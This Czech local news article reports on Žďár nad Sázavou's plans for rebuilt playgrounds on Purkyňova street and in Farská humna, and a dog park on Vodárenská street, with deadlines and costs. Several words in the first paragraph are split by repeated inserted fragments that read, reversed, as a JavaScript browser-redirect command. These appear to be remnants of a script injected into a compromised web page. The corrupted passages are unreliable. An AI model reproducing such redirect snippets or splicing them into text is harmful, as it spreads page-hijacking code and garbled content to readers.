Rainbow page separator

Na přestavěná hřiště i psí park se lidé mohou těšit napřesrok

Středa, 1. prosince 2021

Žďár nad Sázavou / Projekt na přebudování dětských hřišť v ulici Purkyňova a ve Farských humnech a nový psí park ve Vodárenské ulici zadala žďárská radnice. V rámci realizace koncepce obnovy dětských hřišť už probíhají projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové práce týkající se hřišť v ulicích Haškova, Okružní a Palachova.
U výstavby psího parku a obnovených dětských hřišť ve Farských humnech a Purkyňově ulici měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to využije řešení, které spočívá v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že jak projekt, tak i jeho realizaci provede stejná firma. Výběr dodavatele už schválili žďárští radní. Dodavatel má po podpisu smlouvy 60 dnů na přípravu projektu, 90 dnů na zajištění stavebního povolení, 150 dní pro získání územního rozhodnutí a 90 dní na vlastní výstavbu dětských hřišť. U psího parku byla výstavba prodloužena na 120 dní kvůli zkoordinování staveb, neboť v lokalitě budou pokračovat práce na revitalizaci čtvrti Vodojem. „Náklady byly vyčísleny na 3,3 milionu korun a vysoutěžili jsme cenu 3 miliony a 86 tisíc korun,“ informoval žďárský starosta Martin Mrkos. Dětská hřiště by měla být dokončena v polovině příštího roku a psí park zhruba o měsíc později. Co se týče obnovy dětských hřišť v ulicích Palachova, Haškova a Okružní, jakmile bude připravený projekt, tamní obyvatelé budou vyzváni k jeho připomínkování.